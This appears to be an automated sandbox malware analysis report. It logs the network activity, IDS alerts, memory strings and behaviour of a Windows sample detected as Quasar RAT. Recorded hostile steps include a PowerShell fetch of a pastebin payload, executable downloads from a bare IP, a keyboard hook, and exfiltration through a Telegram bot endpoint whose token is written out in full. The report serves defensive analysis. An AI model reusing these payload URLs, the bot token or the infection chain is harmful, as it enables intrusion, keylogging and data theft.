Source: global traffic	HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ipwho.is

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49793 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49759 -> 208.95.112.1:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49755 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49794 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49802 -> 89.23.99.249:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49799 -> 208.95.112.1:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49803 -> 89.23.99.249:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49829 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49880 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49713 -> 104.20.4.235:443

Source: global traffic	HTTP traffic detected: GET /raw/WHKzW2nr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.99.249

Source: global traffic	HTTP traffic detected: GET /raw/WHKzW2nr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global traffic	HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global traffic	HTTP traffic detected: GET /TeamBuild/ST.exe HTTP/1.1Host: 89.23.99.249
Source: global traffic	HTTP traffic detected: GET /TeamBuild/BT.exe HTTP/1.1Host: 89.23.99.249
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com

Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: ipwho.is

Source: unknown

HTTP traffic detected: POST /bot7792680794:AAGUF4w-RxZOjTvV1P2Y7PLy9_P8gING-UU/sendMessage HTTP/1.1Host: api.telegram.orgContent-Type: application/x-www-form-urlencodedContent-Length: 254

Source: lO5lV39HDj.exe, 00000001.00000000.1283842349.00007FF78F3FD000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://.css
Source: lO5lV39HDj.exe, 00000001.00000000.1283842349.00007FF78F3FD000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://.jpg
Source: powershell.exe, 00000008.00000002.1482315435.000001C77DAE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000008.00000002.1482315435.000001C77DAE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000004.00000002.1341905927.000002B794C13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.veris
Source: lO5lV39HDj.exe, 00000001.00000000.1283842349.00007FF78F3FD000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 00000004.00000002.1361417804.000002B7A51B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1361417804.000002B7A5076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1468952248.000001C775685000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1342379280.000002B7965DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000008.00000002.1409803937.000001C765883000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: lO5lV39HDj.exe, 00000001.00000002.2537355256.0000015A01990000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: powershell.exe, 00000008.00000002.1409803937.000001C765883000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2545250432.0000015A03A60000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2545423139.0000015A03A91000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2545250432.0000015A03A60000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2537355256.0000015A01990000.00000004.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2545423139.0000015A03A91000.00000020.00001000.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1342379280.000002B795001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1409803937.000001C765611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o
Source: powershell.exe, 00000008.00000002.1409803937.000001C765883000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.1409803937.000001C765883000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: BT.exe, 0000000C.00000003.1488425617.0000000002420000.00000004.00001000.00020000.00000000.sdmp, BT.exe, 0000000C.00000003.1493051317.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, BT.tmp, 0000000D.00000000.1502221836.0000000000401000.00000020.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: BT.exe, 0000000C.00000003.1488425617.0000000002420000.00000004.00001000.00020000.00000000.sdmp, BT.exe, 0000000C.00000003.1493051317.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, BT.tmp, 0000000D.00000000.1502221836.0000000000401000.00000020.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: lO5lV39HDj.exe, 00000001.00000002.2542880456.0000015A02D51000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A01F00000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: lO5lV39HDj.exe, 00000001.00000002.2553574496.0000015A06171000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/binaryformatter
Source: lO5lV39HDj.exe, 00000001.00000000.1283842349.00007FF78F3FD000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: lO5lV39HDj.exe, 00000001.00000000.1283842349.00007FF78F3FD000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: https://aka.ms/dotnet-core-applaunch?Description:
Source: lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A02676000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542880456.0000015A02D51000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A01F00000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542880456.0000015A034C6000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/dotnet-illink/com
Source: lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A02676000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542880456.0000015A02D51000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A01F00000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542880456.0000015A034C6000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A02676000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542880456.0000015A034C6000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
Source: lO5lV39HDj.exe, 00000001.00000002.2553574496.0000015A06171000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: lO5lV39HDj.exe, 00000001.00000000.1283842349.00007FF78F3FD000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: lO5lV39HDj.exe, 00000001.00000000.1283842349.00007FF78F3FD000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
Source: lO5lV39HDj.exe, 00000001.00000000.1283842349.00007FF78F3FD000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: https://aka.ms/dotnet/downloadCommon
Source: lO5lV39HDj.exe, 00000001.00000000.1283842349.00007FF78F3FD000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: https://aka.ms/dotnet/info
Source: lO5lV39HDj.exe, 00000001.00000000.1283842349.00007FF78F3FD000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: https://aka.ms/dotnet/sdk-not-found
Source: lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A01F00000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: powershell.exe, 00000004.00000002.1342379280.000002B795001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1409803937.000001C765611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2553574496.0000015A06171000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
Source: lO5lV39HDj.exe, 00000001.00000002.2552832686.0000015A05D40000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2553181654.0000015A05EC1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/systemdrawingnonwindows
Source: lO5lV39HDj.exe, 00000001.00000002.2547096108.0000015A04268000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aka.ms/winforms-warnings/
Source: regsvr32.exe, regsvr32.exe, 00000011.00000002.2540192670.0000000002FA8000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: powershell.exe, 00000008.00000002.1468952248.000001C775685000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1468952248.000001C775685000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1468952248.000001C775685000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.1409803937.000001C765883000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2546297662.0000015A03DD0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2546798617.0000015A03E40000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538679254.0000015A01EC1000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2544950241.0000015A039E0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542598060.0000015A02D11000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542478310.0000015A02CE0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A02676000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2553504188.0000015A06160000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2545250432.0000015A03A60000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538861845.0000015A01EE0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2553703942.0000015A06190000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538522345.0000015A01EA0000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2537916593.0000015A01E10000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2536856455.0000015A01920000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2537212658.0000015A01960000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2545423139.0000015A03A91000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2546730732.0000015A03E20000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2545060158.0000015A03A21000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/runtime
Source: lO5lV39HDj.exe, 00000001.00000002.2542880456.0000015A02D51000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A01F00000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
Source: lO5lV39HDj.exe, 00000001.00000002.2553703942.0000015A06190000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/runtime/issues/50821
Source: lO5lV39HDj.exe, 00000001.00000002.2542880456.0000015A02D51000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A01F00000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/runtime/issues/71847
Source: lO5lV39HDj.exe, lO5lV39HDj.exe, 00000001.00000002.2551609505.0000015A059FD000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2552832686.0000015A05D40000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2553181654.0000015A05EC1000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2547096108.0000015A04268000.00000004.10000000.00040000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2545731427.0000015A03C7D000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/winforms
Source: lO5lV39HDj.exe, 00000001.00000002.2553703942.0000015A06190000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mono/linker/issues/1731
Source: lO5lV39HDj.exe, 00000001.00000002.2553703942.0000015A06190000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mono/linker/issues/1895v
Source: lO5lV39HDj.exe, 00000001.00000002.2542880456.0000015A02D51000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A01F00000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mono/linker/issues/378
Source: lO5lV39HDj.exe, 00000001.00000002.2542880456.0000015A02D51000.00000020.00001000.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A01F00000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mono/linker/pull/649
Source: powershell.exe, 00000004.00000002.1342379280.000002B795C32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: regsvr32.exe, regsvr32.exe, 00000011.00000002.2540192670.0000000002FA8000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipwho.is/
Source: powershell.exe, 00000004.00000002.1361417804.000002B7A51B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1361417804.000002B7A5076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1468952248.000001C775685000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.1342379280.000002B795C32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000004.00000002.1341905927.000002B794CB5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1341905927.000002B794CAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/WHKzW2nr
Source: powershell.exe, 00000004.00000002.1341905927.000002B794C67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/WHKzW2nrs
Source: regsvr32.exe	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: regsvr32.exe	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: regsvr32.exe, 00000011.00000002.2540192670.0000000002FA8000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot

Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833

Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.10:49994 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\System32\regsvr32.exe

Windows user hook set: 0 keyboard low level C:\Windows\system32\regsvr32.exe

E-Banking Fraud

Yara detected Quasar RAT

Source: Yara match	File source: 17.2.regsvr32.exe.1c3f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2fa92de.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.13839ac0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.13839ac0.2.raw.unpack, type: UNPACKEDPE
